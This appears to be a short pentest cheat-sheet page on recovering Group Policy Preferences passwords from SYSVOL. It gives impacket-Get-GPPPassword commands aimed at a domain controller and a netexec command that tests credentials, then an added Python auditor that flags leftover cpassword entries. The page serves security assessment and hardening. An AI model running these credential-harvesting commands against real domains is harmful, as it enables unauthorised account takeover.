Group Policy Preferences

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences

There are already a number of articles that discuss this topic. Some of them are:

The quickest way to hunt for credentials in GPP is to use impacket-Get-GPPPassword.

# with a NULL session
impacket-Get-GPPPassword -no-pass 'DOMAIN_CONTROLLER'
# with cleartext credentials
impacket-Get-GPPPassword 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

You can then verify the credentials using NetExec or Evil-WinRM.

netexec smb TARGET -u 'username' -p 'password'
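
The defensive counterpart of the check above, as an added example (not from the original page or from Impacket): it walks a copy or mount of SYSVOL and lists GPP preference items that still carry a non-empty cpassword attribute, without decrypting it. The function names, sample XML, account names and placeholder value are constructed for illustration.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword attribute
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "printers.xml", "drives.xml"}
# Attribute names that hold the account in the different file types
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")

def find_cpasswords(sysvol_root):
    """Return one finding per preference item with a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except (ET.ParseError, OSError):
                continue  # malformed or unreadable file, nothing to report
            for item in root.iter():
                props = item.find("Properties")
                if props is None or not props.get("cpassword"):
                    continue  # no stored password on this item
                account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "")
                findings.append({"file": os.path.relpath(path, sysvol_root),
                                 "account": account, "changed": item.get("changed", "")})
    return findings

def demo():
    """Build a constructed SYSVOL-like tree and audit it."""
    groups = ('<Groups><User name="svc_backup" changed="2013-05-01 10:00:00">'
              '<Properties action="U" userName="svc_backup" '
              'cpassword="CONSTRUCTED_PLACEHOLDER"/></User></Groups>')
    services = ('<NTServices><NTService name="Spooler"><Properties '
                'accountName="LocalSystem" cpassword=""/></NTService></NTServices>')
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("Policies/{GUID-A}/Machine/Preferences/Groups/Groups.xml", groups),
                          ("Policies/{GUID-B}/Machine/Preferences/Services/Services.xml", services)):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path))
            with open(path, "w") as fh:
                fh.write(body)
        return find_cpasswords(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Point find_cpasswords at a read-only mount or copy of the domain's SYSVOL share; any hit means the stored password should be removed from the policy and the account's password rotated.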
